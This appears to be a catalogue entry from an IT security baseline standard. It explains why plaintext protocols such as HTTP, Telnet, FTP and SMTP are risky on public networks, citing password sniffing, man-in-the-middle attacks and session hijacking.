T 2.87 Use of insecure protocols in public networks

When communication is performed using public networks, especially the internet, a series of threats arises when insecure protocols are used.

One serious threat is that confidential information could fall into the wrong hands. Protocols transmitting information in plain text must be considered insecure protocols in particular. Since it is impossible to predict the route taken by the data packets when transmitted over the internet, it is possible in this case to read the information transmitted at various locations. This is particularly critical when the data contains the following types of information:

• authentication data such as user names and passwords,
• authorisation data, for example transaction numbers for electronic banking or electronic brokerage,

• other confidential information, for example the information in documents sent by e-mail.

Examples of protocols transmitting all information in plain text include:

• the Hypertext Transfer Protocol HTTP, which is used for communication between web browsers and web servers,
• the Telnet protocol, which is still used in some places to log on remotely,
• the File Transfer Protocol FTP, which is still commonly used to access servers providing files for downloading,
• the Simple Mail Transfer Protocol SMTP, which is used to transmit e-mail,
• the rsh (remote shell) and rlogin (remote login) protocols, as well as other related protocols.

With such protocols, it is possible to read and possibly even change all information transmitted over any computer located in the communication route. The transmission of credit card numbers and passwords in the internet using HTTP connections is particularly critical.

Using password sniffers, it is possible to read passwords while they are being transmitted to a system. This then allows the attacker to gain access to this IT system and subsequently perform other attacks locally on the computer.

Man-in-the-middle attacks and session hijacking are potential threats when using one of the protocols mentioned, especially HTTP or Telnet (see T 5.89 Hijacking of network connections). During these types of attacks, an attacker is not only able to read information, but is also able to actively inflict damage by changing the transactions currently being

processed. For example, prices or order quantities in orders placed over the internet can be changed so that the person who sent the order only sees and receives confirmation for the items or the delivery address he/she has entered, while the attacker sends an order to the seller for a significantly larger amount, which is then sent to a different delivery address.

In addition to the protocols mentioned transmitting all information in plain text, there are also protocols that at least permit encryption of the transmission containing the authentication data. However, there is still a risk that the utilisation information transmitted could be read.